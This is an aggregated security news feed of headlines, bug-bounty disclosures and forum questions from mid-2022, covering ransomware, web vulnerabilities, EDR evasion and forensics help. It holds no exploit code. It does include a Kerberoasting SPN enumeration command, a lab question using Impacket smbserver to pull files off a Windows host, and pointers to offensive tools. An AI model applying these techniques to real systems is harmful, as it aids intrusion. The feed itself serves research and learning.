    Georgetown University's Center on Privacy & Technology released a report exposing that US Immigration and Customs Enforcement built a surveillance system that circumvents the law to carry out near-total surveillance of US citizens.
    Lockbit again attacks two public-sector bodies
    The recently very active Lockbit ransomware gang has attacked the equipment of two local governments.
    Tophant (斗象科技) again listed on the CCSIP 2022 China Cybersecurity Industry Panorama
    Tophant was selected in 12 major categories and 27 sub-segments of the panorama.
    Microsoft: IIS extensions increasingly used as Exchange backdoors
    Attackers are increasingly using malicious Internet Information Services (IIS) web server extensions to deploy backdoors on unpatched Exchange servers.
    Selected session videos from the attack-and-defense exercise track now online | CIS Conference Summer Edition
    On July 27, some sessions from the CIS core forum "Real-network confrontation and attack-and-defense exercise track" went online as public courses!
    Online reading edition: full text of the 2022 China Software Supply Chain Security Analysis Report
    Although the "Log4Shell" vulnerability had an unprecedented impact, critical foundational open-source software still does not receive enough attention. We should learn from this incident, systematically catalogue critical foundational open-source software like Log4j2, investigate and harden vulnerabilities at the foundation layer, and adopt stronger, targeted security protection measures.

    Burp Suite certification: a year in review
    It’s been a year since we launched our Burp Suite Certified Practitioner exam, so we’ve been reflecting on some of the improvements and developments we’ve made across both our preparation materials an

    Reflected Cross Site Scripting on User Agent-Dependent Response
    Hello folks, Continue reading on Medium »

    HTML Injection via Email Share
    TikTok disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1490311 - Bounty: $500

    Rods and Cones, and EDR "blindness"
    I ran across an interesting post recently regarding blinding EDR on Windows systems, which describes four general techniques for avoiding EDR monitoring. Looking at the techniques, I've seen several of these techniques in use on actual, real world incidents. For example, while I was with the Crowdstrike Overwatch team, we observed a threat actor reach out to determine systems with Falcon installed; of the fifteen systems queried, we knew from our records that only four were covered. We lost visibility because the threat actor moved to one of the other eleven systems. I've also seen threat actors "disappear from view" when they've used the Powershell console rather than cmd.exe, or when the threat actor has shell-based/RDP access to systems and uses a GUI-based tool. EDR telemetry includes …


    Inbound FW rules for “cybersecurity”?
    I am part of a team that's standing up a lab network that resides on a corporate DMZ. The lab network will be isolated except for a handful of resources, all outbound. My lab has its own firewall because we want to lock it down. I told the network engineer I wanted all inbound ports blocked and he said he couldn't do that. At first, he said it's because of endpoint management software that the LAN users have. I pointed out that our network has a unique use case and was approved to not have endpoint management software loaded on any of the devices. Then he said that cybersecurity needs inbound ports to do their scans. This doesn't make much sense to me so I pushed back and asked what ports exactly. He did not like that and just said "I've been doing this a long time". Two questions: 1. Shouldn't "all inbound ports blocked" be an optimal position from a security standpoint? 2. Are there any legitimate inbound ports that should be open for "cybersecurity"? Thanks for helping me learn! submitted by /u/pseudorandom_name
    Question about Kerberoasting
    Hi, I created a simple lab with 1 VM as Domain Controller (Windows 2019) and a few users/computers. I ran setspn -T domain.local and I found several SPNs, but just one is in CN=Users, while others are mostly in CN=Computers. If I understand correctly, such SPNs (computers, domain controller) aren't useful for Kerberoasting because they generally have very complex passwords, correct? I mean: Kerberoasting is meant to be a valid attack path only with SPNs configured on regular user accounts? Thank you submitted by /u/g-simon
    Since the connection ID (CID) isn't encrypted in QUIC packets and QUIC allows you to keep existing connections even if your IP changes because it verifies the CID, isn't it easy to spoof a user?
    For example when someone is on the same network as you. submitted by /u/esp32s2

    10 ways to approach a New Bounty target
    Poke around with the external surface and stuffs like external search and parameters on the outside and not really dive into learning the… Continue reading on Medium »
    Publicly Accessible Android Crash Reports Containing Sensitive Information
    Hello Guys, Continue reading on Medium »
    HTTP Parameter Pollution - It’s Contaminated Again
    Summary : Continue reading on Medium »
    IW Weekly #11: Hacking Nginx, eJPT2.0, Free Hacking Resources, OWASP API, and more
    Hey 👋 Continue reading on InfoSec Write-ups »
    Sensitive Data Exposure: Inspect Element leading to MongoDB Atlas injection via Realm
    Sensitive Data Exposure vulnerabilities can occur when a web application does not adequately protect sensitive information from being… Continue reading on Medium »
    Redeemer HackTheBox Challenge Walkthrough
    Redeemer by HackTheBox is indeed a very good challenge. So in this writeup/walkthrough we are going to see how we can pwn (hack) the… Continue reading on Medium »

    Fake Vulnerability, Risk Aversion and You
    Article URL: https://www.residentcontrarian.com/p/fake-vulnerability-risk-aversion Comments URL: https://news.ycombinator.com/item?id=32243828 Points: 2 # Comments: 0
    Log4j Zero-Day Vulnerability: Everything You Need to Know About the Apache Flaw
    Article URL: https://www.spiceworks.com/it-security/vulnerability-management/articles/log4j-apache-vulnerability-everything-you-need-to-know/ Comments URL: https://news.ycombinator.com/item?id=32235197 Points: 2 # Comments: 1

    Hunting For Mass Assignment Vulnerabilities Using GitHub CodeSearch and grep.app
    submitted by /u/l_tennant
    Malicious IIS extensions quietly open persistent backdoors into servers
    submitted by /u/SCI_Rusher
    Awesome Open-Source Adversary Simulation Tools
    submitted by /u/sciencestudent99
    CVE-2022-31813: Forwarding addresses is hard
    submitted by /u/0xdea
    How to analyze Linux malware – A case study of Symbiote
    submitted by /u/CyberMasterV
    Zyxel authentication bypass patch analysis (CVE-2022-0342)
    submitted by /u/0xdea
    Bypass AMSI in local process hooking NtCreateSection
    submitted by /u/gid0rah
    GitHub - InitRoot/wodat: Windows Oracle Database Attack Toolkit
    submitted by /u/InitRoot
    US Government Review of the December 2021 Log4j Event
    submitted by /u/ScottContini
    When Hypervisor Met Snapshot Fuzzing
    submitted by /u/Gallus

    Magnet Axiom Android Mobile Evidence
    Hi, is there other software out there that can open/examine/export from the evidence files? Can Encase or Cellebrite PA accomplish this? submitted by /u/hw60068n

    Race condition in faucet when using starport
    Cosmos disclosed a bug submitted by cyberboy: https://hackerone.com/reports/1438052 - Bounty: $5000

    War in Ukraine / July 25
    Day 153: A strong South or strong East — is Russia’s dilemma Continue reading on Medium »
    STRATDELA Special Issue #1: Dark Eagle
    In this first Special Issue of my STRATDELA newsletter (https://www.getrevue.co/profile/STRATDELA) Continue reading on Medium »
    OPINION: OSINT, Ethics and Social Media
    Apparently, the internet [the people operating consoles that feed information in the form of human interaction through fiber optic cable]… Continue reading on Medium »
    How to identify your Email Credential Leaked Information
    Continue reading on Medium »

    SecWiki News 2022-07-26 Review
    No news updated today~ For more of the latest articles, visit SecWiki

    IW Weekly #11: Hacking Nginx, eJPT2.0, Free Hacking Resources, OWASP API, and more
    No content preview
    You MUST sanitize PHP mail() inputs — or else RCE!
    No content preview
    Mail Server Misconfiguration leads to sending a fax from anyone’s account on HelloFax (Dropbox BBP)…
    No content preview

    Attackers Move Quickly to Exploit High-Profile Zero Days: Insights From the 2022 Unit 42 Incident Response Report
    The Unit 42 Incident Response Report includes insights on which software vulnerabilities are commonly exploited for initial access and a description of how attacker behavior around zero-day vulnerabilities is shifting. The post Attackers Move Quickly to Exploit High-Profile Zero Days: Insights From the 2022 Unit 42 Incident Response Report appeared first on Unit 42.

    FreeBuf Morning Report | Software problems lead to the dismissal of Volkswagen's CEO; new variant of UEFI motherboard BIOS trojan discovered
    Venture investment across the cybersecurity sector fell to 3.4 billion US dollars in the second quarter, a quarter-on-quarter decline of nearly 40%.
    Threat trapping with open-source honeypots | FreeBuf enterprise community livestream recap
    On July 21, Jiang Peng (安平不太平), a security expert at an IoT company, was the keynote guest at the seventh internal livestream of the FreeBuf enterprise community, sharing threat trapping based on open-source honeypots.
    Cyber powers series | How the US became the hegemon of cyberspace
    The many cyberattacks launched by the US, taken together, show the powerful cybersecurity capability behind them, which has gradually carried it to the throne of cyber hegemony.
    FileWave MDM vulnerabilities could let threat actors compromise thousands of enterprises
    Claroty researchers found two vulnerabilities in the FileWave MDM product.
    Hackers exploit PrestaShop zero-day to compromise online shops
    The PrestaShop team issued an urgent warning last Friday that hackers are targeting websites using the PrestaShop platform.
    Lockbit ransomware gang claims to have breached Italy's tax agency
    The Lockbit ransomware gang claims to have stolen 78 GB of files from the Italian tax agency.
    Source code of Rust-coded info-stealing malware published; experts warn it is already being used
    The malware's developer claims it was built in only 6 hours, is quite stealthy, and has a VirusTotal detection rate of about 22%.
    [Hot topic] 2022 attack-and-defense exercise intelligence tracking
    With the exercises approaching, FreeBuf and Vulbox (漏洞盒子) Intelligence Planet bring you fresh and timely intelligence sharing~
    Shanghai launches a call for results for the 2022 cybersecurity industry innovation research catalogue
    The Shanghai Municipal Commission of Economy and Informatization has compiled the "2022 Shanghai Cybersecurity Industry Innovation Research Catalogue".


    Introduction
    Hello guys my name is caleb jephuneh and welcome to my blog Continue reading on Medium »
    Sensitive Data Exposure: Taking over all accounts, your account = my account.
    Sensitive Data Exposure vulnerabilities can occur when a web application does not adequately protect sensitive information from being… Continue reading on Medium »
    OPEN REDIRECT VULNERABILITIES: ESCALATING TO XSS
    This article was originally published at BePractical Continue reading on Medium »
    Mail Server Misconfiguration leads to sending a fax from anyone’s account on HelloFax (Dropbox BBP)…
    Hi Everyone!, Continue reading on InfoSec Write-ups »
    Mail Server Misconfiguration leads to sending a fax from anyone’s account on HelloFax (Dropbox BBP)…
    Hi Everyone!, Continue reading on Medium »
    DoS worth $650 ? Interesting right!
    Hey Guys, my name is Sagar Sajeev. This is my second writeup and I would like to share how I was rewarded with a bounty of $650 for a… Continue reading on Medium »
    How I Gained Access To A Finance Company’s Accounts (Session Hijacking)
    In a web application security test, I gained access to hundreds of accounts that have belonged to a finance company. The vulnerability… Continue reading on Medium »
    MSA Weekly 5 - “How to Get Sensitive Data Exposure on Web Application”
    OWASP category Continue reading on Medium »
    $1.333 For Account Takeover Via Reset Password
    Assalamualaikum, hello Bug Hunter! This time I found a very critical security hole in one of the applications. Without further ado, straight… Continue reading on Medium »
    Open Redirect vulnerability in igp.com
    Hello everyone, I am Vignesh, a 20-year-old Security Researcher from TamilNadu, India. Continue reading on Medium »

    Automate google hacking database by python script.
    In this tutorial we have simple python script which will ask for url and use certain dork to search in google and finally show the result… Continue reading on Medium »
    The importance of educating Security Personnel and Intelligence Analysts about biases
    Bias is a topic that many industries like to avoid, and the security and intelligence industries are no exception. However, there is a… Continue reading on Medium »
    Social Media Investigations and Monitoring for Risk Mitigation Purposes
    The use of social media and the way it affects our lives and businesses have brought a new challenge to the security industry and the… Continue reading on Medium »
    War in Ukraine / July 22–24
    Day 152: The battle for Vuhlehirska Power Station Continue reading on Medium »
    Searching YouTube videos by coordinates
    Youtube needs no introduction — everybody knows what it is. But for us, OSINT enthusiasts, it is much more than just a video platform… Continue reading on Medium »
    OSINT ON SOCIAL MEDIA ACCOUNTS
    USING SHERLOCK TOOL TO CONDUCT OSINT Continue reading on Medium »

    Finding Flaws in FileWave MDM
    submitted by /u/derp6996
    CosmicStrand: the discovery of a sophisticated UEFI firmware rootkit
    submitted by /u/surrealisticpillow12
    Attack Chain Déjà-vu: The infection vector used by SVCReady, Gozi and IcedID
    submitted by /u/OwnPreparation3424
    Pulsar — an open-source runtime security framework powered by Rust & eBPF for IoT
    submitted by /u/JDBHub
    PART 2: How I Met Your Beacon - Cobalt Strike
    submitted by /u/Gallus
    Multiple vulnerabilities in Nuki smart locks
    submitted by /u/Gallus
    Since Microsoft patched PPLDump's exploit I'm open sourcing RIPPL, a tool based off PPLDump which enabled more offensive capabilities against PPL processes like EDRs - @last0x00
    submitted by /u/last0x00

    Node.js - DLL Hijacking on Windows
    Internet Bug Bounty disclosed a bug submitted by yakirka: https://hackerone.com/reports/1636566 - Bounty: $3000

    Tales from the onsite
    This blog will contain all sorts of social engineering shenanigans, mainly from onsite assessments. Continue reading on Medium »
    How I chained multiple CVEs & other vulnerabilities during an RTO to pwn the company remotely
    The exploitation of Pulse VPN application to gain full control on the VPN server and pivot across the cloud infrastructure. Continue reading on Medium »
    Weaponizing DLL Hijacking with Custom Powershell C2
    Is DLL Hijacking dangerous? How can DLL Hijacked be used in real-life scenario? Hold me keyboard! Continue reading on Medium »

    Docker: Creating a Pivoting Lab and Exploiting it
    https://medium.com/p/a66646dc2cf3 submitted by /u/Protection-Mobile
    Pivoting with Socks and Proxychains
    submitted by /u/Clement_Tino
    PART 2: How I Met Your Beacon - Cobalt Strike - @MDSecLabs
    submitted by /u/dmchell

    SecWiki News 2022-07-25 Review
    PDGraph: a large-scale empirical study of insecure project dependencies by ourren; NeuVector, feature-rich and powerful open-source container security software by ourren; A survey of just-in-time defect prediction tools by ourren; Buffer overflow vulnerabilities: the C gets function by SecIN Community; SecWiki Weekly (Issue 438) by ourren; For more of the latest articles, visit SecWiki

    IAM-Deescalate: An Open Source Tool to Help Users Reduce the Risk of Privilege Escalation
    We developed an open source tool, IAM-Deescalate, to help mitigate the privilege escalation risks of overly permissive identities in AWS. The post IAM-Deescalate: An Open Source Tool to Help Users Reduce the Risk of Privilege Escalation appeared first on Unit 42.

    Imaging the impossible? A Samsung Galaxy Book Go
    Hi all! I have a Samsung Galaxy Book Go (np340xla) that so far feels impossible to image and I was wondering if anyone had any suggestions. This is what I have tried so far: Remove the disk: can't, it's soldered on. Boot from Paladin/Kali/Ubuntu/Mint: USB won't appear as an option. Secure Boot is already disabled (was never enabled). BIOS is the most minimal BIOS I have ever seen. UEFI option from BIOS? Non-existent. Can't boot from anything other than the Windows Boot Manager or an option called "USB: hard disk" (it goes back to the disk). I have used USB-C, USB-3, USB-2, powered USB hub. I have tried the Linux distros in both UEFI and I can reach the "recovery" option from Windows, but that won't get me anywhere other than deleting the disk. Any other ideas? At this point, I will accept ANYTHING as long as I can image this laptop. Just in case it is asked: I don't have the PIN (: submitted by /u/agente_99
    Best site for memory forensic test
    Hi, there are plenty of sites that test you in network forensics that provide you with a pcap file to analyze and ask you questions to answer. Are there any sites like that for memory forensics that you like? submitted by /u/antmar9041

    FreeBuf Morning Report | Digital yuan can meet the need for anonymous personal payments; Google fires engineer who claimed its chatbot is sentient
    The engineer insisted that Google's LaMDA chatbot is sentient; Google dismissed him for violating its "employment and data security policies" protecting trade secrets.
    IDC network threat detection and response market report: Tophant (斗象科技) leads in growth
    Tophant was selected for the IDC report, with its PRS-NTA product showing outstanding market growth
    QBot infects devices via DLL sideloading
    A DLL sideloading flaw in Windows 7 has recently been exploited by the QBot malware.
    Distributed with the help of SmokeLoader malware, Amadey makes a comeback
    A new version of the Amadey Bot malware uses software cracks and keygen sites as lures and is being distributed via the SmokeLoader malware.
    Hackers selling the data of 5.4 million Twitter accounts for 30,000 US dollars
    The hackers say the data covers the account information of some well-known figures, companies and organizations, as well as random ordinary users.
    Digital security giant Entrust suffers ransomware attack
    Digital security giant Entrust has admitted that it suffered a cyberattack in which the attackers breached its internal network and stole a certain amount of data.

    This is why you should ALWAYS check for Race Conditions (even in JavaScript)
    No content preview

    Differentiate three types of eBPF redirections (2022)
    TL;DR: There are three types of eBPF redirection fashions in the Linux kernel that often confuse developers: bpf_redirect_peer(), bpf_redirect_neighbor() and bpf_redirect(). This post helps to clarify them by digging into the code in historical order, and also discusses usages and related problems in the real world.
    TL;DR
    1 The foundation: bpf_redirect(), 2015
    1.1 The documentation: Description; Comparison with bpf_clone_redirect()
    1.2 Kernel implementations/changes: 1. Add TC action type TC_ACT_REDIRECT; 2. Add new BPF helper & syscall; 3. Process redirect logic in TC BPF
    1.3 Call stack
    2 Egress optimization: bpf_redirect_neighbor(), 2020
    2.1 Comparison with bpf_redirect()
    2.2 Kernel implementations/changes: 1. Modify skb_do_redirect(), prefer the new one whenever available 2.…


    TryHackMe — NahamStore Part 1 | XSS (Tasks 3&4) —  (Medium)
    Hello again and welcome to another one of my CTF write-up attempts. Since I have recently been trying to step up my web app pentesting… Continue reading on Medium »

    Analyzing raw image
    This may seem like a stupid question, but I've been trying to figure this out all day and I haven't had a clue. I'm using PowerShell to open Volatility and I want to analyze a raw image I have saved in my Downloads folder on my Windows computer. How can I tell Volatility via PowerShell to open that image? submitted by /u/1rangusN1dangus

    ProtectMyTooling – Don’t detect tools, detect techniques – mgeeky's lair
    submitted by /u/dmchell

    3 things to do if you want to be a penetration tester
    Now that I would consider myself to no longer be a beginner penetration tester, I feel like it is a great time to reflect on my personal… Continue reading on Medium »
    start hacking carrier part 4 | create a custom word list for you target …
    is a pain follow these steps to create custom word list for your target if you are new in bug bounty and you want to learn from scratch… Continue reading on Medium »
    ONERARE TESTNET QUICK GUIDE 70,000 $ORARE AS REWARD
    OneRare is creating the world’s first Foodverse for the Global Food Industry. Our first launch is the Gaming Zone, celebrating Dishes from… Continue reading on Medium »
    Privilege Escalation
    Assalam O Alaikum. Alhamdullillah! Continue reading on Medium »
    Red vs Blue Team Project
    Assessment, Analysis, and Hardening of a vulnerable system. This report includes a Red Team Security Assessment, a Blue Team Log Analysis… Continue reading on Medium »
    A Developer’s Nightmare: Story of a simple IDOR and some poor fixes worth $1125
    Hello Everyone, I hope you all are doing good. This is my second blog and in this will be covering a finding of a Simple IDOR followed by… Continue reading on Medium »
    MSA Weekly 5 — “How to Get Sensitive Data Exposure on Web Application”
    In the world of pentesting there is a standard used as a reference or security standard that readers may already know… Continue reading on Medium »
    Why Did I Fail At Bug Bounties?
    Hello folks, Continue reading on Medium »
    Host Header injection to redirect in live website
    Hi this is my fifth blog and if you want to read my first blog(about xss bug) then click on this link: My First Bug Bounty. Continue reading on Medium »
    The 6 UGLY TRUTHS about Security Certifications
    Here we are again, with yet another (possibly) controversial topic. This time is about security certifications. Regardless if you are in… Continue reading on Medium »

    CVE-2022-27781: CERTINFO never-ending busy-loop
    Internet Bug Bounty disclosed a bug submitted by sybr: https://hackerone.com/reports/1606039 - Bounty: $480

    MFA validity through multiple IP addresses
    Hello, I got an alert saying that an O365 OWA account was being logged in from multiple IP addresses. On checking, I found that while the user was in India and had MFA enabled, the logins were happening through over 100 separate IP addresses in Nigeria. The user may have used Microsoft Authenticator to accidentally click yes to one of the logins. How do these attackers manage to keep sessions alive over multiple computers and over the period of a week? Is there a change that needs to be made in the O365 admin console to protect against this? Say, ask for the password every 12 hours, and the same for MFA. I am checking the audit logs and clearly the attacker read some of the user's emails, but no harm that we can find yet. submitted by /u/indianadmin
    Does anyone have any extra SANS practice tests available?
    Does anyone have any extra SANS practice tests (SANS 522) available? submitted by /u/herbertisthefuture

    Assets for geocities.restorativland.org (mostly screenshots)
    submitted by /u/ilikemacsalot
    'alternative living' stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME
    Fractals
    submitted by /u/PM_ME_TO_PLAY_A_GAME
    Movies but what language are they?
    http://www.konectar1.com/yesi/ http://www.netfrg.com/mov/ submitted by /u/RainyAbrar
    Movies
    Not sure about speed. Didn't go through it all, hence marking NSFW. http://jotokusi.com/ftp/ Not sure if already posted "site:reddit.com/r/opendirectories http://jotokusi.com/ftp/" -- turned up no result for me. submitted by /u/RainyAbrar

    The End of PPLdump
    submitted by /u/0xdea
    Investigating a Hacked WordPress site on Linode. Step by step.
    submitted by /u/nykzhang

    SecWiki News 2022-07-24 Review
    No news updated today~ For more of the latest articles, visit SecWiki

    History Repeats Itself
    It's said that those who do not study history are doomed to repeat it. I'd suggest that the adage should be extended to, "those who do not study history and learn from her lessons are doomed to repeat it." My engagement with technology began at an early age; in the early '80s, I was programming BASIC on a very early IBM-based PC, the Timex-Sinclair 1000, and Mac IIe. By the mid-'80s, I'd programmed in BASIC and Pascal on the TRS-80. However, it wasn't until I completed my initial military training in 1990 that I began providing technology as a service to others; I was a Communications Officer in the Marine Corps, providing trained technical Marines, servicing technical assets, in support of others. I had been taught about the technology...radios, phones, switchboards, etc...and troublesho…

    How to Become an OSINT Master: Tips, Tricks, and Tools — Part 2
    Hey Folks! I hope you liked part -1 of my OSINT series. In this blog, we will discuss some excellent and professional techniques of… Continue reading on Medium »
    SPY NEWS: 2022 — Week 29
    Summary of the espionage-related news stories for the Week 29 (July 17–23) of 2022. Continue reading on Medium »

    Red vs Blue Team Project
    Assessment, Analysis, and Hardening of a vulnerable system. This report includes a Red Team Security Assessment, a Blue Team Log Analysis… Continue reading on Medium »

    Who Touched My DevOps: Mapping DevOps Risks
    The DevOps market exceeded US$7 billion in 2021 and is expected to grow at a compound annual growth rate of more than 20% between 2022 and 2028.
    Attackers promote a new version of Redeemer ransomware on hacker forums
    Threat actors are promoting a new version of the Redeemer ransomware builder on hacker forums.

    Pivoting Techniques with THM Wreath
    No content preview

    Coursera Specializations - Are they worth it in Forensics/Cyber Incident Response?
    Hey all - general research. Are certifications/specializations from Coursera (with capstone projects or practicals) worth it? I am currently studying for CompTIA Sec+ (10+ years of experience working in IT/incident response) and working in an analyst role with security IT work incorporated. I'd like to get additional experience, particularly in Computer/Digital Forensics, and upskill in my Cyber Response practices. I wanted to specialize in a niche, as a supplement to CompTIA Sec+ studies.
    - How are the following courses, would this be worth it (via the company InfoSec)? Cyber Incident Response Specialization; Computer Forensics Specialization
    - Are there any solid books I could purchase that cover concepts for Computer/Digital Forensics and Cyber Incident Response? For example, I was checking out this book as a starting point: Digital Forensics and Incident Response
    Thank you for any advice in advance. submitted by /u/sora1493
    Remote work question
    Hi, I'm currently looking at getting into this field, and I wanted to ask: what are the chances of me, a European, getting a fully remote IR job in the U.S.? Will employers greatly prefer a candidate based in the U.S. even if the job can be done fully remote? As a foreigner I don't qualify for a security clearance; would this be a big barrier to getting a job? Thank you in advance. submitted by /u/Frederic_-104
    Extracting all images and videos from Autopsy using python
    Hi, I have a quick question concerning writing something in Python to extract all images and videos from Autopsy. I am halfway through the code to filter files into newly created folders depending on the file extensions, but currently this only picks up files from a folder, not directly from Autopsy. Is it even possible to link it? And two, if it is possible, how would I go about linking it? If you need any more information please ask. I am only building this as the last three projects I've worked on have all been over 80,000 files, and it's easier to filter out the useless files when they have been assigned to a folder. Thanks submitted by /u/sudo_oth

    Help understanding computer vulnerability to malware and hacks
    OS: Windows 11. Hi all, I am a bit of a hypochondriac, but with viruses etc., always thinking I'm going to get hacked or I already am and someone has control over my PC. So I want to ask the following: Are drive-by downloads, i.e. unintended dangerous file downloads when I visit a dodgy website and popups come up and tabs open and/or close, possible on Google Chrome? If so, how can I find out if my computer is infested? Is it possible for a virus or malicious files or software to attach itself to personal files on my PC, or can I safely move my personal files to an external drive and format my PC? Does a Windows full scan detect the above-mentioned? Thanks a lot for any help! submitted by /u/lassolass
    How can a hacker get into your pics to then use them to blackmail you?
    I know someone who was blackmailed with some di*k pics, and wonder how to avoid this kind of situation submitted by /u/MoteCnHuesillo
    Trying to help a friend who has a Deadbolt issue. No idea what I'm doing!
    So a friend of mine has their own business, and when they tried to attach a picture to an email they noticed that rather than .jpeg, it read .deadbolt (I think). I've looked it up and it just says to update the firmware, but they will still need to pay the ransom to get any encrypted files back. I just wondered if anyone knows anything about this and can tell me if what I've read is right, or if anyone has any further ideas or suggestions? submitted by /u/Silver020

    Twitter Vulnerability Exposes Data from 5.4M Accounts
    Article URL: https://restoreprivacy.com/twitter-vulnerability-exposes-5-million-accounts/ Comments URL: https://news.ycombinator.com/item?id=32208204 Points: 1 # Comments: 0
    Verified Twitter Vulnerability Exposes Data from 5.4M Accounts
    Article URL: https://restoreprivacy.com/twitter-vulnerability-exposes-5-million-accounts/ Comments URL: https://news.ycombinator.com/item?id=32201333 Points: 4 # Comments: 0

    Transferring files from windows to kali using Impacket smbserver.py doesn't work?
    Transferring files from Kali to Windows is easy with something like python http.server. What about transferring files from Windows to Kali? I found a very useful blog post here and attempted to do a similar thing with Impacket smbserver.py: https://blog.ropnop.com/transferring-files-from-kali-to-windows/#smb
    Setup: Kali: 172.16.1.10, Windows: 172.16.1.50
    Run smbserver on Kali with Impacket smbserver.py:
    └─$ /usr/share/doc/python3-impacket/examples/smbserver.py share /tmp
    Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
    [*] Config file parsed
    However, whenever I try on Windows, I'm getting "System error 53 has occurred, The network path was not found" as follows:
    C:\>net view \\172.16.1.10\
    System error 53 has occurred.
    The network path was not found.
    Here is the message on Impacket smbserver.py:
    [*] Incoming connection (172.16.1.50,56201)
    [*] Closing down connection (172.16.1.50,56201)
    [*] Remaining connections []
    Then, I tried again with \share, but still getting the same error:
    C:\>net view \\172.16.1.10\share
    System error 53 has occurred.
    The network path was not found.
    What's wrong and what should I do to make this right? submitted by /u/w0lfcat

    GUIDE: Debunking disinformation about tanks forming a bank barricade in China.
    Open source investigation often can be used as a weapon to fight disinformation that is spread on social-media. One of them that stood out… Continue reading on Medium »
    TryHackMe | Sakura Room
    TryHackMe’s Sakura Room. From finding an image left by an attacker to finding their town. Continue reading on Medium »

    SecWiki News 2022-07-23 Review
    No news updated yet today~ For more of the latest articles, please visit SecWiki

    Bug Bounty: Hunting Open Redirect Vulnerabilities For $$$
    This article was originally published at BePractical Continue reading on Medium »
    Un3xpected DoS Attack on Profile Pictur3
    Hey Everyone, Hope y’all doing gr3at and aw3some! Continue reading on InfoSec Write-ups »
    My Bug Bounty Resources
    Hello Amazing People, Continue reading on System Weakness »
    $$$ bounty in less 3 minutes from a google dork
    ~ Hi Bug Bounty Hunters & CyberSecurity folks!!! It’s been long since i dropped a bug bounty writeup. Continue reading on Medium »
    CyberTalents BootCamp 2022 #fisher
    ~ Steiner254 says … Congratulations!!! For making it to CyberTalents BootCamp 2022. Good Luck in your journey :) Continue reading on Medium »
    YACHTINGVERSE STAKING TESTNET CAMPAIGN (QUICK GUIDE)
    YachtingVerse is an open-world marine theme massive multi-users platform built on the BNB Beacon Chain. This platform will bring together… Continue reading on Medium »
    SecStory: How I Found Multiple P1 Vulnerabilities without Recon
    Hi folks.. Nowadays there are so many bug hunting story over there on internet, but for me I named this as my “SecStory” it stands for… Continue reading on Medium »
    Meow Starting Point HackTheBox Walkthrough
    Meow is a very good Challenge by HackTheBox for starting to practice Hacking skills. So without any delays let’s get into it. Continue reading on Medium »

    Un3xpected DoS Attack on Profile Pictur3
    No content preview
    I mean, IDOR is NOT only about others ID
    No content preview
    How to NOT keep your Active Directory safe.
    No content preview
    This one trick will exploit URL parsers to perform SSRF
    No content preview
    This is why you should NEVER use the eval() function — RCE!
    No content preview
    Be Careful of User Input. You will get hacked.
    No content preview
    Beware of Ghosts!! — when CVE-2018-16509 leads to Remote Code Execution.
    No content preview

    Turning Open Reporting Into Detections
    I saw this tweet from Ankit recently, and as soon as I read through it, I thought I was watching "The Matrix" again. Instead of seeing the "blonde, brunette, redhead" that Cypher saw, I was seeing actionable detection opportunities and pivot points. How you choose to use them...detections in EDR telemetry or from a SIEM, threat hunts, or specifically flagging/alerting on entries in DFIR parsing...is up to you, but there are some interesting...and again, actionable...opportunities, nonetheless. From the tweet itself... %Draft% is environment variable leading to PowerShell Environment variables are good...because someone has to set that variable using...wait for it...w  a  i  t   f  o  r    i  t...the 'set' command. This means that if the variable is set via the command line, the process …

    [doc.rt.informaticacloud.com] Reflected XSS via Stack Strace
    Informatica disclosed a bug submitted by bigbear_: https://hackerone.com/reports/232320
    [doc.rt.informaticacloud.com] Arbitrary File Reading via Double URL Encode
    Informatica disclosed a bug submitted by bigbear_: https://hackerone.com/reports/232371
    reflected XSS on panther.com
    Panther Labs disclosed a bug submitted by ibrahimatix0x01: https://hackerone.com/reports/1601140 - Bounty: $250
    Rack CVE-2022-30122: Denial of Service Vulnerability in Rack Multipart Parsing
    Internet Bug Bounty disclosed a bug submitted by ooooooo_q: https://hackerone.com/reports/1627159 - Bounty: $2400

    Career in Cybersecurity
    Career in Cybersecurity Continue reading on Bilişim Hareketi »

    Jonathan's fun stuff
    http://users.ninja.org.uk/~jonathan/funstuff/ submitted by /u/RainyAbrar

    An informal review of CTF abuse
    Recently, chatting with a friend, I realized I can recall a lot of interesting stories of how players tried to abuse a given CTF tournament to gain an extra edge over the competition. So in this informal blog post I'll try to list what I remember, both for the purpose of documenting this so others can learn from history, and also for its fun factor (or rather: fun factor after a couple of years passed and folks stopped being annoyed or downright furious at the perpetrators). Note that some of what I'll log here are just stories I've heard. Other things I might have witnessed on my own. In either case I won't be posting any details of who / when / at what CTF – that's not the purpose of this post. Rather than that, I'll try to distill and present the general concept. Update: In case you…

    IDOR in report download functionality on ads.tiktok.com
    TikTok disclosed a bug submitted by f_m: https://hackerone.com/reports/1559739 - Bounty: $500
    CVE-2022-32214 - HTTP Request Smuggling Due To Improper Delimiting of Header Fields
    Internet Bug Bounty disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1630669 - Bounty: $1800
    CVE-2022-32213 - HTTP Request Smuggling Due to Flawed Parsing of Transfer-Encoding
    Internet Bug Bounty disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1630668 - Bounty: $1800
    CVE-2022-32215 - HTTP Request Smuggling Due to Incorrect Parsing of Multi-line Transfer-Encoding
    Internet Bug Bounty disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1630667 - Bounty: $1800

    Vex: Permanently Silence False Positives with Vulnerability EXchange
    Article URL: https://www.lunasec.io/docs/blog/vex-silence-false-positives/ Comments URL: https://news.ycombinator.com/item?id=32198211 Points: 1 # Comments: 0
    Major Security Vulnerability on PrestaShop Websites
    Article URL: https://build.prestashop.com/news/major-security-vulnerability-on-prestashop-websites/ Comments URL: https://news.ycombinator.com/item?id=32196961 Points: 2 # Comments: 1

    Sector035’s 2020 OSINT Quiz
    I’m an OSINT newbie, but have been looking for challenges to practice a few of the skills I‘ve developed, and I came across this 18… Continue reading on Medium »
    OSINT: Vulnerable Webcam using SHODAN
    Shodan is one of the most popular and dangerous search engine which gives you all information from the banners and pulls from web-enabled… Continue reading on Medium »
    TryHackMe | Searchlight — IMINT Writeup
    TryHackMe’s Searchlight - IMINT room is an easy image-related OSINT room. We are tasked with analyzing images and finding information… Continue reading on Medium »
    War in Ukraine / July 21
    Day 149: The situation at the front has been stabilized. Helped by HIMARS Continue reading on Medium »
    #SwissArms: how to identify Sig Sauer assault rifles with Saudi forces in Yemen’s war
    Preamble Continue reading on Medium »
    Revealing Who Is Behind SPM55
    SPM55 is a threat actor from Indonesia who sells phishing or scampages. This was actually already discussed in a Twitter thread on the 31… Continue reading on Medium »

    New to DFIR. Unable to mount drives in Paladin.
